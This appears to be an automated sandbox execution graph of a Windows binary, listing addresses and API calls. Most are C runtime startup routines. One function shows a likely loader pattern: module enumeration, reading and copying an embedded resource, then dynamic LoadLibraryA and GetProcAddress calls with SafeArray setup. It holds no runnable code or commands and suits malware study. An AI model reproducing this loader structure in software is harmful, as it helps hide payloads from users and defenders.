                                                                                                                                                                                                                          execution_graph 12604 40cbdd 12605 40cbe9 12604->12605 12648 40d534 HeapCreate 12605->12648 12608 40cc46 12773 41087e GetModuleHandleW 12608->12773 12611 40cc4c 12612 40cc50 12611->12612 12615 40cc58 __RTC_Initialize 12611->12615 12613 40cbb4 _fast_error_exit 62 API calls 12612->12613 12614 40cc57 12613->12614 12614->12615 12650 411a15 12615->12650 12617 40cc66 12618 40cc72 GetCommandLineA 12617->12618 12619 40cc6a 12617->12619 12665 412892 12618->12665 12806 40e79a 12619->12806 12625 40cc8c 12626 40cc90 12625->12626 12627 40cc98 12625->12627 12628 40e79a __amsg_exit 62 API calls 12626->12628 12690 41255f 12627->12690 12630 40cc97 12628->12630 12630->12627 12632 40cca1 12634 40e79a __amsg_exit 62 API calls 12632->12634 12633 40cca9 12705 40e859 12633->12705 12636 40cca8 12634->12636 12636->12633 12637 40ccb0 12638 40ccb5 12637->12638 12639 40ccbc 12637->12639 12641 40e79a __amsg_exit 62 API calls 12638->12641 12711 4019f0 OleInitialize 12639->12711 12643 40ccbb 12641->12643 12642 40ccd8 12644 40ccea 12642->12644 12824 40ea0a 12642->12824 12643->12639 12827 40ea36 12644->12827 12647 40ccef _doexit 12649 40cc3a 12648->12649 12649->12608 12765 40cbb4 12649->12765 12830 40e1d8 12650->12830 12652 411a21 GetStartupInfoA 12831 411cba 12652->12831 12654 411c60 _doexit 12654->12617 12655 411bdd GetStdHandle 12660 411ba7 12655->12660 12656 411cba __calloc_crt 62 API calls 12659 411a42 12656->12659 12657 411c42 SetHandleCount 12657->12654 12658 411bef GetFileType 12658->12660 12659->12654 12659->12656 12659->12660 12663 411b2a 12659->12663 12660->12654 12660->12655 12660->12657 12660->12658 12661 41389c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 12660->12661 12661->12660 12662 411b53 GetFileType 12662->12663 12663->12654 12663->12660 12663->12662 12837 41389c 12663->12837 12666 4128b0 GetEnvironmentStringsW 12665->12666 12667 4128cf 12665->12667 12668 4128c4 GetLastError 12666->12668 12669 4128b8 12666->12669 12667->12669 12670 412968 12667->12670 12668->12667 12671 4128eb GetEnvironmentStringsW 12669->12671 12672 4128fa WideCharToMultiByte 12669->12672 12673 412971 GetEnvironmentStrings 12670->12673 12674 40cc82 12670->12674 12671->12672 12671->12674 12677 41295d FreeEnvironmentStringsW 12672->12677 12678 41292e 12672->12678 12673->12674 12675 412981 12673->12675 12813 4127d7 12674->12813 12679 411c75 __malloc_crt 62 API calls 12675->12679 12677->12674 12680 411c75 __malloc_crt 62 API calls 12678->12680 12682 41299b 12679->12682 12681 412934 12680->12681 12681->12677 12684 41293c WideCharToMultiByte 12681->12684 12683 4129a2 FreeEnvironmentStringsA 12682->12683 12685 4129ae _memcpy_s 12682->12685 12683->12674 12686 412956 12684->12686 12687 41294e 12684->12687 12688 4129b8 FreeEnvironmentStringsA 12685->12688 12686->12677 12689 40b6b5 ___endstdio 62 API calls 12687->12689 12688->12674 12689->12686 12691 412568 12690->12691 12693 41256d _strlen 12690->12693 13175 41446b 12691->13175 12694 411cba __calloc_crt 62 API calls 12693->12694 12697 40cc9d 12693->12697 12700 4125a2 _strlen 12694->12700 12695 412600 12696 40b6b5 ___endstdio 62 API calls 12695->12696 12696->12697 12697->12632 12697->12633 12698 411cba __calloc_crt 62 API calls 12698->12700 12699 412626 12701 40b6b5 ___endstdio 62 API calls 12699->12701 12700->12695 12700->12697 12700->12698 12700->12699 12702 40ef42 _strcpy_s 62 API calls 12700->12702 12703 4125e7 12700->12703 12701->12697 12702->12700 12703->12700 12704 40e61c __invoke_watson 10 API calls 12703->12704 12704->12703 12706 40e867 __IsNonwritableInCurrentImage 12705->12706 13580 413586 12706->13580 12708 40e885 __initterm_e 12710 40e8a4 __IsNonwritableInCurrentImage __initterm 12708->12710 13584 40d2bd 12708->13584 12710->12637 12712 401ab9 12711->12712 13684 40b99e 12712->13684 12714 401abf 12715 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 12714->12715 12745 402467 12714->12745 12716 401dc3 CloseHandle GetModuleHandleA 12715->12716 12724 401c55 12715->12724 13697 401650 12716->13697 12718 401e8b FindResourceA LoadResource LockResource SizeofResource 12719 40b84d _malloc 62 API calls 12718->12719 12720 401ebf 12719->12720 13699 40af66 12720->13699 12722 401c9c CloseHandle 12722->12642 12723 401ecb _memset 12725 401efc SizeofResource 12723->12725 12724->12722 12728 401cf9 Module32Next 12724->12728 12726 401f1c 12725->12726 12727 401f5f 12725->12727 12726->12727 13737 401560 12726->13737 12730 401f92 _memset 12727->12730 12731 401560 __VEC_memcpy 12727->12731 12728->12716 12737 401d0f 12728->12737 12732 401fa2 FreeResource 12730->12732 12731->12730 12733 40b84d _malloc 62 API calls 12732->12733 12734 401fbb SizeofResource 12733->12734 12735 401fe5 _memset 12734->12735 12736 4020aa LoadLibraryA 12735->12736 12738 401650 12736->12738 12737->12722 12740 401dad Module32Next 12737->12740 12739 40216c GetProcAddress 12738->12739 12741 4021aa 12739->12741 12739->12745 12740->12716 12740->12737 12741->12745 13711 4018f0 12741->13711 12743 40243f 12744 40b6b5 ___endstdio 62 API calls 12743->12744 12743->12745 12744->12745 12745->12642 12746 4021f1 12746->12743 13723 401870 12746->13723 12748 402269 VariantInit 12749 401870 75 API calls 12748->12749 12750 40228b VariantInit 12749->12750 12751 4022a7 12750->12751 12752 4022d9 SafeArrayCreate SafeArrayAccessData 12751->12752 13728 40b350 12752->13728 12755 40232c 12756 402354 SafeArrayDestroy 12755->12756 12757 40235b 12755->12757 12756->12757 12758 402392 SafeArrayCreateVector 12757->12758 12759 4023a4 12758->12759 12760 4023bc VariantClear VariantClear 12759->12760 13730 4019a0 12760->13730 12763 40242e 12764 4019a0 65 API calls 12763->12764 12764->12743 12766 40cbc2 12765->12766 12767 40cbc7 12765->12767 12768 40ec4d __FF_MSGBANNER 62 API calls 12766->12768 12769 40eaa2 __NMSG_WRITE 62 API calls 12767->12769 12768->12767 12770 40cbcf 12769->12770 12771 40e7ee _doexit 3 API calls 12770->12771 12772 40cbd9 12771->12772 12772->12608 12774 410892 12773->12774 12775 410898 12773->12775 12776 40e76a __crt_waiting_on_module_handle 2 API calls 12774->12776 12777 410a01 12775->12777 12778 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12775->12778 12776->12775 14013 410598 12777->14013 12782 4108ec TlsAlloc 12778->12782 12781 410a06 12781->12611 12782->12781 12783 41093a TlsSetValue 12782->12783 12783->12781 12784 41094b 12783->12784 14002 40ea54 12784->14002 12787 41046e __encode_pointer 6 API calls 12788 41095b 12787->12788 12789 41046e __encode_pointer 6 API calls 12788->12789 12790 41096b 12789->12790 12791 41046e __encode_pointer 6 API calls 12790->12791 12792 41097b 12791->12792 12793 41046e __encode_pointer 6 API calls 12792->12793 12794 41098b 12793->12794 14009 40d564 12794->14009 12797 4104e9 __decode_pointer 6 API calls 12798 4109ac 12797->12798 12798->12777 12799 411cba __calloc_crt 62 API calls 12798->12799 12800 4109c5 12799->12800 12800->12777 12801 4104e9 __decode_pointer 6 API calls 12800->12801 12802 4109df 12801->12802 12802->12777 12803 4109e6 12802->12803 12804 4105d5 __initptd 62 API calls 12803->12804 12805 4109ee GetCurrentThreadId 12804->12805 12805->12781 12807 40ec4d __FF_MSGBANNER 62 API calls 12806->12807 12808 40e7a4 12807->12808 12809 40eaa2 __NMSG_WRITE 62 API calls 12808->12809 12810 40e7ac 12809->12810 12811 4104e9 __decode_pointer 6 API calls 12810->12811 12812 40cc71 12811->12812 12812->12618 12814 4127f1 GetModuleFileNameA 12813->12814 12815 4127ec 12813->12815 12817 412818 12814->12817 12816 41446b ___initmbctable 106 API calls 12815->12816 12816->12814 14022 41263d 12817->14022 12820 412874 12820->12625 12821 411c75 __malloc_crt 62 API calls 12822 41285a 12821->12822 12822->12820 12823 41263d _parse_cmdline 72 API calls 12822->12823 12823->12820 14034 40e8de 12824->14034 12826 40ea1b 12826->12644 12828 40e8de _doexit 62 API calls 12827->12828 12829 40ea41 12828->12829 12829->12647 12830->12652 12834 411cc3 12831->12834 12833 411d00 12833->12659 12834->12833 12835 411ce1 Sleep 12834->12835 12841 40e231 12834->12841 12836 411cf6 12835->12836 12836->12833 12836->12834 13174 40e1d8 12837->13174 12839 4138a8 InitializeCriticalSectionAndSpinCount 12840 4138ec _doexit 12839->12840 12840->12663 12842 40e23d _doexit 12841->12842 12843 40e255 12842->12843 12853 40e274 _memset 12842->12853 12854 40bfc1 12843->12854 12847 40e2e6 RtlAllocateHeap 12847->12853 12850 40e26a _doexit 12850->12834 12853->12847 12853->12850 12860 40d6e0 12853->12860 12867 40def2 12853->12867 12873 40e32d 12853->12873 12876 40d2e3 12853->12876 12879 4106bc GetLastError 12854->12879 12856 40bfc6 12857 40e744 12856->12857 12858 4104e9 __decode_pointer 6 API calls 12857->12858 12859 40e754 __invoke_watson 12858->12859 12861 40d6f5 12860->12861 12862 40d708 EnterCriticalSection 12860->12862 12957 40d61d 12861->12957 12862->12853 12864 40d6fb 12864->12862 12865 40e79a __amsg_exit 61 API calls 12864->12865 12866 40d707 12865->12866 12866->12862 12869 40df20 12867->12869 12868 40dfb9 12872 40dfc2 12868->12872 13169 40db09 12868->13169 12869->12868 12869->12872 13162 40da59 12869->13162 12872->12853 13173 40d606 LeaveCriticalSection 12873->13173 12875 40e334 12875->12853 12877 4104e9 __decode_pointer 6 API calls 12876->12877 12878 40d2f3 12877->12878 12878->12853 12893 410564 TlsGetValue 12879->12893 12881 410729 SetLastError 12881->12856 12883 411cba __calloc_crt 59 API calls 12884 4106e7 12883->12884 12884->12881 12898 4104e9 TlsGetValue 12884->12898 12887 410720 12926 40b6b5 12887->12926 12888 410708 12908 4105d5 12888->12908 12891 410726 12891->12881 12892 410710 GetCurrentThreadId 12892->12881 12894 410594 12893->12894 12895 410579 12893->12895 12894->12881 12894->12883 12896 4104e9 __decode_pointer 6 API calls 12895->12896 12897 410584 TlsSetValue 12896->12897 12897->12894 12899 410501 12898->12899 12900 410522 GetModuleHandleW 12898->12900 12899->12900 12901 41050b TlsGetValue 12899->12901 12902 410532 12900->12902 12903 41053d GetProcAddress 12900->12903 12905 410516 12901->12905 12932 40e76a 12902->12932 12907 41051a 12903->12907 12905->12900 12905->12907 12907->12887 12907->12888 12936 40e1d8 12908->12936 12910 4105e1 GetModuleHandleW 12911 4105f1 12910->12911 12912 4105f7 12910->12912 12913 40e76a __crt_waiting_on_module_handle 2 API calls 12911->12913 12914 410633 12912->12914 12915 41060f GetProcAddress GetProcAddress 12912->12915 12913->12912 12916 40d6e0 __lock 58 API calls 12914->12916 12915->12914 12917 410652 InterlockedIncrement 12916->12917 12937 4106aa 12917->12937 12920 40d6e0 __lock 58 API calls 12921 410673 12920->12921 12940 4145d2 InterlockedIncrement 12921->12940 12923 410691 12952 4106b3 12923->12952 12925 41069e _doexit 12925->12892 12927 40b6c1 _doexit 12926->12927 12928 40b714 HeapFree 12927->12928 12930 40b73d _doexit 12927->12930 12929 40b727 12928->12929 12928->12930 12931 40bfc1 __controlfp_s 61 API calls 12929->12931 12930->12891 12931->12930 12933 40e775 Sleep GetModuleHandleW 12932->12933 12934 40e793 12933->12934 12935 40e797 12933->12935 12934->12933 12934->12935 12935->12903 12935->12907 12936->12910 12955 40d606 LeaveCriticalSection 12937->12955 12939 41066c 12939->12920 12941 4145f0 InterlockedIncrement 12940->12941 12942 4145f3 12940->12942 12941->12942 12943 414600 12942->12943 12944 4145fd InterlockedIncrement 12942->12944 12945 41460a InterlockedIncrement 12943->12945 12946 41460d 12943->12946 12944->12943 12945->12946 12947 414617 InterlockedIncrement 12946->12947 12949 41461a 12946->12949 12947->12949 12948 414633 InterlockedIncrement 12948->12949 12949->12948 12950 414643 InterlockedIncrement 12949->12950 12951 41464e InterlockedIncrement 12949->12951 12950->12949 12951->12923 12956 40d606 LeaveCriticalSection 12952->12956 12954 4106ba 12954->12925 12955->12939 12956->12954 12958 40d629 _doexit 12957->12958 12959 40d64f 12958->12959 12983 40ec4d 12958->12983 12967 40d65f _doexit 12959->12967 13029 411c75 12959->13029 12965 40d680 12970 40d6e0 __lock 62 API calls 12965->12970 12966 40d671 12969 40bfc1 __controlfp_s 62 API calls 12966->12969 12967->12864 12969->12967 12972 40d687 12970->12972 12973 40d6bb 12972->12973 12974 40d68f 12972->12974 12975 40b6b5 ___endstdio 62 API calls 12973->12975 12976 41389c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 12974->12976 12977 40d6ac 12975->12977 12978 40d69a 12976->12978 13034 40d6d7 12977->13034 12978->12977 12980 40b6b5 ___endstdio 62 API calls 12978->12980 12981 40d6a6 12980->12981 12982 40bfc1 __controlfp_s 62 API calls 12981->12982 12982->12977 13037 413d5b 12983->13037 12986 413d5b __set_error_mode 62 API calls 12988 40ec61 12986->12988 12987 40eaa2 __NMSG_WRITE 62 API calls 12989 40ec79 12987->12989 12988->12987 12990 40d63e 12988->12990 12991 40eaa2 __NMSG_WRITE 62 API calls 12989->12991 12992 40eaa2 12990->12992 12991->12990 12993 40eab6 12992->12993 12994 413d5b __set_error_mode 59 API calls 12993->12994 13025 40d645 12993->13025 12995 40ead8 12994->12995 12996 40ec16 GetStdHandle 12995->12996 12998 413d5b __set_error_mode 59 API calls 12995->12998 12997 40ec24 _strlen 12996->12997 12996->13025 13001 40ec3d WriteFile 12997->13001 12997->13025 12999 40eae9 12998->12999 12999->12996 13000 40eafb 12999->13000 13000->13025 13043 40ef42 13000->13043 13001->13025 13004 40eb31 GetModuleFileNameA 13006 40eb4f 13004->13006 13011 40eb72 _strlen 13004->13011 13008 40ef42 _strcpy_s 59 API calls 13006->13008 13010 40eb5f 13008->13010 13009 40ebb5 13068 413ce7 13009->13068 13010->13011 13012 40e61c __invoke_watson 10 API calls 13010->13012 13011->13009 13059 411da6 13011->13059 13012->13011 13017 40ebd9 13019 413ce7 _strcat_s 59 API calls 13017->13019 13018 40e61c __invoke_watson 10 API calls 13018->13017 13020 40ebed 13019->13020 13022 40ebfe 13020->13022 13023 40e61c __invoke_watson 10 API calls 13020->13023 13021 40e61c __invoke_watson 10 API calls 13021->13009 13077 413b7e 13022->13077 13023->13022 13026 40e7ee 13025->13026 13128 40e7c3 GetModuleHandleW 13026->13128 13030 411c7e 13029->13030 13032 40d66a 13030->13032 13033 411c95 Sleep 13030->13033 13131 40b84d 13030->13131 13032->12965 13032->12966 13033->13030 13161 40d606 LeaveCriticalSection 13034->13161 13036 40d6de 13036->12967 13038 413d6a 13037->13038 13039 40ec54 13038->13039 13040 40bfc1 __controlfp_s 62 API calls 13038->13040 13039->12986 13039->12988 13041 413d8d 13040->13041 13042 40e744 __controlfp_s 6 API calls 13041->13042 13042->13039 13044 40ef53 13043->13044 13045 40ef5a 13043->13045 13044->13045 13047 40ef80 13044->13047 13046 40bfc1 __controlfp_s 62 API calls 13045->13046 13051 40ef5f 13046->13051 13049 40eb1d 13047->13049 13050 40bfc1 __controlfp_s 62 API calls 13047->13050 13048 40e744 __controlfp_s 6 API calls 13048->13049 13049->13004 13052 40e61c 13049->13052 13050->13051 13051->13048 13104 40ba30 13052->13104 13054 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13055 40e725 GetCurrentProcess TerminateProcess 13054->13055 13056 40e719 __invoke_watson 13054->13056 13106 40ce09 13055->13106 13056->13055 13058 40e742 13058->13004 13064 411db8 13059->13064 13060 411dbc 13061 40bfc1 __controlfp_s 62 API calls 13060->13061 13062 40eba2 13060->13062 13063 411dd8 13061->13063 13062->13009 13062->13021 13065 40e744 __controlfp_s 6 API calls 13063->13065 13064->13060 13064->13062 13066 411e02 13064->13066 13065->13062 13066->13062 13067 40bfc1 __controlfp_s 62 API calls 13066->13067 13067->13063 13069 413cff 13068->13069 13071 413cf8 13068->13071 13070 40bfc1 __controlfp_s 62 API calls 13069->13070 13076 413d04 13070->13076 13071->13069 13074 413d33 13071->13074 13072 40e744 __controlfp_s 6 API calls 13073 40ebc8 13072->13073 13073->13017 13073->13018 13074->13073 13075 40bfc1 __controlfp_s 62 API calls 13074->13075 13075->13076 13076->13072 13115 4104e0 13077->13115 13080 413ba1 LoadLibraryA 13081 413bb6 GetProcAddress 13080->13081 13093 413ccb 13080->13093 13083 413bcc 13081->13083 13081->13093 13082 413c29 13086 4104e9 __decode_pointer 6 API calls 13082->13086 13099 413c53 13082->13099 13118 41046e TlsGetValue 13083->13118 13084 4104e9 __decode_pointer 6 API calls 13084->13093 13085 4104e9 __decode_pointer 6 API calls 13094 413c96 13085->13094 13088 413c46 13086->13088 13090 4104e9 __decode_pointer 6 API calls 13088->13090 13090->13099 13091 41046e __encode_pointer 6 API calls 13092 413be7 GetProcAddress 13091->13092 13095 41046e __encode_pointer 6 API calls 13092->13095 13093->13025 13098 4104e9 __decode_pointer 6 API calls 13094->13098 13101 413c7e 13094->13101 13096 413bfc GetProcAddress 13095->13096 13097 41046e __encode_pointer 6 API calls 13096->13097 13100 413c11 13097->13100 13098->13101 13099->13085 13099->13101 13100->13082 13102 413c1b GetProcAddress 13100->13102 13101->13084 13103 41046e __encode_pointer 6 API calls 13102->13103 13103->13082 13105 40ba3c __VEC_memzero 13104->13105 13105->13054 13107 40ce11 13106->13107 13108 40ce13 IsDebuggerPresent 13106->13108 13107->13058 13114 4138fc 13108->13114 13111 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 13112 413723 __invoke_watson 13111->13112 13113 41372b GetCurrentProcess TerminateProcess 13111->13113 13112->13113 13113->13058 13114->13111 13116 41046e __encode_pointer 6 API calls 13115->13116 13117 4104e7 13116->13117 13117->13080 13117->13082 13119 4104a7 GetModuleHandleW 13118->13119 13120 410486 13118->13120 13122 4104c2 GetProcAddress 13119->13122 13123 4104b7 13119->13123 13120->13119 13121 410490 TlsGetValue 13120->13121 13127 41049b 13121->13127 13125 41049f GetProcAddress 13122->13125 13124 40e76a __crt_waiting_on_module_handle 2 API calls 13123->13124 13126 4104bd 13124->13126 13125->13091 13126->13122 13126->13125 13127->13119 13127->13125 13129 40e7d7 GetProcAddress 13128->13129 13130 40e7e7 ExitProcess 13128->13130 13129->13130 13132 40b900 13131->13132 13142 40b85f 13131->13142 13133 40d2e3 __calloc_impl 6 API calls 13132->13133 13134 40b906 13133->13134 13136 40bfc1 __controlfp_s 61 API calls 13134->13136 13135 40ec4d __FF_MSGBANNER 61 API calls 13140 40b870 13135->13140 13148 40b8f8 13136->13148 13138 40eaa2 __NMSG_WRITE 61 API calls 13138->13140 13139 40b8bc RtlAllocateHeap 13139->13142 13140->13135 13140->13138 13141 40e7ee _doexit 3 API calls 13140->13141 13140->13142 13141->13140 13142->13139 13142->13140 13143 40b8ec 13142->13143 13145 40d2e3 __calloc_impl 6 API calls 13142->13145 13146 40b8f1 13142->13146 13142->13148 13149 40b7fe 13142->13149 13144 40bfc1 __controlfp_s 61 API calls 13143->13144 13144->13146 13145->13142 13147 40bfc1 __controlfp_s 61 API calls 13146->13147 13147->13148 13148->13030 13150 40b80a _doexit 13149->13150 13151 40b83b _doexit 13150->13151 13152 40d6e0 __lock 62 API calls 13150->13152 13151->13142 13153 40b820 13152->13153 13154 40def2 ___sbh_alloc_block 5 API calls 13153->13154 13155 40b82b 13154->13155 13157 40b844 13155->13157 13160 40d606 LeaveCriticalSection 13157->13160 13159 40b84b 13159->13151 13160->13159 13161->13036 13163 40daa0 HeapAlloc 13162->13163 13164 40da6c HeapReAlloc 13162->13164 13165 40dac3 VirtualAlloc 13163->13165 13166 40da8a 13163->13166 13164->13166 13167 40da8e 13164->13167 13165->13166 13168 40dadd HeapFree 13165->13168 13166->12868 13167->13163 13168->13166 13170 40db20 VirtualAlloc 13169->13170 13172 40db67 13170->13172 13172->12872 13173->12875 13174->12839 13176 414474 13175->13176 13177 41447b 13175->13177 13179 4142d1 13176->13179 13177->12693 13180 4142dd _doexit 13179->13180 13210 410735 13180->13210 13184 4142f0 13231 414070 13184->13231 13187 414430 _doexit 13187->13177 13188 411c75 __malloc_crt 62 API calls 13189 414311 13188->13189 13189->13187 13238 4140ec 13189->13238 13192 414341 InterlockedDecrement 13194 414351 13192->13194 13195 414362 InterlockedIncrement 13192->13195 13193 41443d 13193->13187 13197 414450 13193->13197 13198 40b6b5 ___endstdio 62 API calls 13193->13198 13194->13195 13200 40b6b5 ___endstdio 62 API calls 13194->13200 13195->13187 13196 414378 13195->13196 13196->13187 13202 40d6e0 __lock 62 API calls 13196->13202 13199 40bfc1 __controlfp_s 62 API calls 13197->13199 13198->13197 13199->13187 13201 414361 13200->13201 13201->13195 13204 41438c InterlockedDecrement 13202->13204 13205 414408 13204->13205 13206 41441b InterlockedIncrement 13204->13206 13205->13206 13208 40b6b5 ___endstdio 62 API calls 13205->13208 13248 414432 13206->13248 13209 41441a 13208->13209 13209->13206 13211 4106bc __getptd_noexit 62 API calls 13210->13211 13212 41073d 13211->13212 13213 41074a 13212->13213 13214 40e79a __amsg_exit 62 API calls 13212->13214 13215 413fcc 13213->13215 13214->13213 13216 413fd8 _doexit 13215->13216 13217 410735 __getptd 62 API calls 13216->13217 13218 413fdd 13217->13218 13219 40d6e0 __lock 62 API calls 13218->13219 13227 413fef 13218->13227 13220 41400d 13219->13220 13221 414056 13220->13221 13223 414024 InterlockedDecrement 13220->13223 13224 41403e InterlockedIncrement 13220->13224 13251 414067 13221->13251 13222 413ffd _doexit 13222->13184 13223->13224 13228 41402f 13223->13228 13224->13221 13226 40e79a __amsg_exit 62 API calls 13226->13222 13227->13222 13227->13226 13228->13224 13229 40b6b5 ___endstdio 62 API calls 13228->13229 13230 41403d 13229->13230 13230->13224 13255 40ec86 13231->13255 13234 4140ad 13236 4140b2 GetACP 13234->13236 13237 41409f 13234->13237 13235 41408f GetOEMCP 13235->13237 13236->13237 13237->13187 13237->13188 13239 414070 getSystemCP 74 API calls 13238->13239 13241 41410c 13239->13241 13240 414117 setSBCS 13242 40ce09 __atodbl_l 5 API calls 13240->13242 13241->13240 13244 41415b IsValidCodePage 13241->13244 13247 414180 _memset __setmbcp_nolock 13241->13247 13243 4142cf 13242->13243 13243->13192 13243->13193 13244->13240 13245 41416d GetCPInfo 13244->13245 13245->13240 13245->13247 13446 413e39 GetCPInfo 13247->13446 13579 40d606 LeaveCriticalSection 13248->13579 13250 414439 13250->13187 13254 40d606 LeaveCriticalSection 13251->13254 13253 41406e 13253->13227 13254->13253 13256 40ec99 13255->13256 13259 40ece6 13255->13259 13257 410735 __getptd 62 API calls 13256->13257 13258 40ec9e 13257->13258 13262 40ecc6 13258->13262 13263 414738 13258->13263 13259->13234 13259->13235 13261 413fcc _LocaleUpdate::_LocaleUpdate 64 API calls 13261->13259 13262->13259 13262->13261 13264 414744 _doexit 13263->13264 13265 410735 __getptd 62 API calls 13264->13265 13266 414749 13265->13266 13267 414777 13266->13267 13269 41475b 13266->13269 13268 40d6e0 __lock 62 API calls 13267->13268 13270 41477e 13268->13270 13271 410735 __getptd 62 API calls 13269->13271 13278 4146fa 13270->13278 13273 414760 13271->13273 13276 41476e _doexit 13273->13276 13277 40e79a __amsg_exit 62 API calls 13273->13277 13276->13262 13277->13276 13279 4146fe 13278->13279 13285 414730 13278->13285 13280 4145d2 ___addlocaleref 8 API calls 13279->13280 13279->13285 13281 414711 13280->13281 13281->13285 13289 414661 13281->13289 13286 4147a2 13285->13286 13445 40d606 LeaveCriticalSection 13286->13445 13288 4147a9 13288->13273 13290 414672 InterlockedDecrement 13289->13290 13291 4146f5 13289->13291 13292 414687 InterlockedDecrement 13290->13292 13293 41468a 13290->13293 13291->13285 13303 414489 13291->13303 13292->13293 13294 414694 InterlockedDecrement 13293->13294 13295 414697 13293->13295 13294->13295 13296 4146a1 InterlockedDecrement 13295->13296 13297 4146a4 13295->13297 13296->13297 13298 4146ae InterlockedDecrement 13297->13298 13300 4146b1 13297->13300 13298->13300 13299 4146ca InterlockedDecrement 13299->13300 13300->13299 13301 4146da InterlockedDecrement 13300->13301 13302 4146e5 InterlockedDecrement 13300->13302 13301->13300 13302->13291 13304 41450d 13303->13304 13307 4144a0 13303->13307 13305 41455a 13304->13305 13306 40b6b5 ___endstdio 62 API calls 13304->13306 13323 414581 13305->13323 13357 417667 13305->13357 13308 41452e 13306->13308 13307->13304 13310 4144d4 13307->13310 13318 40b6b5 ___endstdio 62 API calls 13307->13318 13311 40b6b5 ___endstdio 62 API calls 13308->13311 13312 4144f5 13310->13312 13322 40b6b5 ___endstdio 62 API calls 13310->13322 13314 414541 13311->13314 13315 40b6b5 ___endstdio 62 API calls 13312->13315 13321 40b6b5 ___endstdio 62 API calls 13314->13321 13324 414502 13315->13324 13316 4145c6 13319 40b6b5 ___endstdio 62 API calls 13316->13319 13317 40b6b5 ___endstdio 62 API calls 13317->13323 13320 4144c9 13318->13320 13325 4145cc 13319->13325 13333 417841 13320->13333 13327 41454f 13321->13327 13328 4144ea 13322->13328 13323->13316 13329 40b6b5 62 API calls ___endstdio 13323->13329 13330 40b6b5 ___endstdio 62 API calls 13324->13330 13325->13285 13331 40b6b5 ___endstdio 62 API calls 13327->13331 13349 4177fc 13328->13349 13329->13323 13330->13304 13331->13305 13334 4178cb 13333->13334 13335 41784e 13333->13335 13334->13310 13336 41785f 13335->13336 13337 40b6b5 ___endstdio 62 API calls 13335->13337 13338 417871 13336->13338 13339 40b6b5 ___endstdio 62 API calls 13336->13339 13337->13336 13340 417883 13338->13340 13341 40b6b5 ___endstdio 62 API calls 13338->13341 13339->13338 13342 417895 13340->13342 13344 40b6b5 ___endstdio 62 API calls 13340->13344 13341->13340 13343 4178a7 13342->13343 13345 40b6b5 ___endstdio 62 API calls 13342->13345 13346 4178b9 13343->13346 13347 40b6b5 ___endstdio 62 API calls 13343->13347 13344->13342 13345->13343 13346->13334 13348 40b6b5 ___endstdio 62 API calls 13346->13348 13347->13346 13348->13334 13350 417809 13349->13350 13356 41783d 13349->13356 13351 417819 13350->13351 13352 40b6b5 ___endstdio 62 API calls 13350->13352 13353 41782b 13351->13353 13354 40b6b5 ___endstdio 62 API calls 13351->13354 13352->13351 13355 40b6b5 ___endstdio 62 API calls 13353->13355 13353->13356 13354->13353 13355->13356 13356->13312 13358 41457a 13357->13358 13359 417678 13357->13359 13358->13317 13360 40b6b5 ___endstdio 62 API calls 13359->13360 13361 417680 13360->13361 13362 40b6b5 ___endstdio 62 API calls 13361->13362 13363 417688 13362->13363 13364 40b6b5 ___endstdio 62 API calls 13363->13364 13365 417690 13364->13365 13366 40b6b5 ___endstdio 62 API calls 13365->13366 13367 417698 13366->13367 13368 40b6b5 ___endstdio 62 API calls 13367->13368 13369 4176a0 13368->13369 13370 40b6b5 ___endstdio 62 API calls 13369->13370 13371 4176a8 13370->13371 13372 40b6b5 ___endstdio 62 API calls 13371->13372 13373 4176af 13372->13373 13374 40b6b5 ___endstdio 62 API calls 13373->13374 13375 4176b7 13374->13375 13376 40b6b5 ___endstdio 62 API calls 13375->13376 13377 4176bf 13376->13377 13378 40b6b5 ___endstdio 62 API calls 13377->13378 13379 4176c7 13378->13379 13380 40b6b5 ___endstdio 62 API calls 13379->13380 13381 4176cf 13380->13381 13382 40b6b5 ___endstdio 62 API calls 13381->13382 13383 4176d7 13382->13383 13384 40b6b5 ___endstdio 62 API calls 13383->13384 13385 4176df 13384->13385 13386 40b6b5 ___endstdio 62 API calls 13385->13386 13387 4176e7 13386->13387 13388 40b6b5 ___endstdio 62 API calls 13387->13388 13389 4176ef 13388->13389 13390 40b6b5 ___endstdio 62 API calls 13389->13390 13391 4176f7 13390->13391 13392 40b6b5 ___endstdio 62 API calls 13391->13392 13393 417702 13392->13393 13394 40b6b5 ___endstdio 62 API calls 13393->13394 13395 41770a 13394->13395 13396 40b6b5 ___endstdio 62 API calls 13395->13396 13397 417712 13396->13397 13398 40b6b5 ___endstdio 62 API calls 13397->13398 13399 41771a 13398->13399 13400 40b6b5 ___endstdio 62 API calls 13399->13400 13401 417722 13400->13401 13402 40b6b5 ___endstdio 62 API calls 13401->13402 13403 41772a 13402->13403 13404 40b6b5 ___endstdio 62 API calls 13403->13404 13405 417732 13404->13405 13406 40b6b5 ___endstdio 62 API calls 13405->13406 13407 41773a 13406->13407 13408 40b6b5 ___endstdio 62 API calls 13407->13408 13409 417742 13408->13409 13410 40b6b5 ___endstdio 62 API calls 13409->13410 13411 41774a 13410->13411 13412 40b6b5 ___endstdio 62 API calls 13411->13412 13413 417752 13412->13413 13414 40b6b5 ___endstdio 62 API calls 13413->13414 13415 41775a 13414->13415 13416 40b6b5 ___endstdio 62 API calls 13415->13416 13417 417762 13416->13417 13418 40b6b5 ___endstdio 62 API calls 13417->13418 13419 41776a 13418->13419 13420 40b6b5 ___endstdio 62 API calls 13419->13420 13421 417772 13420->13421 13422 40b6b5 ___endstdio 62 API calls 13421->13422 13423 41777a 13422->13423 13424 40b6b5 ___endstdio 62 API calls 13423->13424 13425 417788 13424->13425 13426 40b6b5 ___endstdio 62 API calls 13425->13426 13427 417793 13426->13427 13428 40b6b5 ___endstdio 62 API calls 13427->13428 13429 41779e 13428->13429 13430 40b6b5 ___endstdio 62 API calls 13429->13430 13431 4177a9 13430->13431 13432 40b6b5 ___endstdio 62 API calls 13431->13432 13433 4177b4 13432->13433 13434 40b6b5 ___endstdio 62 API calls 13433->13434 13435 4177bf 13434->13435 13436 40b6b5 ___endstdio 62 API calls 13435->13436 13437 4177ca 13436->13437 13438 40b6b5 ___endstdio 62 API calls 13437->13438 13439 4177d5 13438->13439 13440 40b6b5 ___endstdio 62 API calls 13439->13440 13441 4177e0 13440->13441 13442 40b6b5 ___endstdio 62 API calls 13441->13442 13443 4177eb 13442->13443 13444 40b6b5 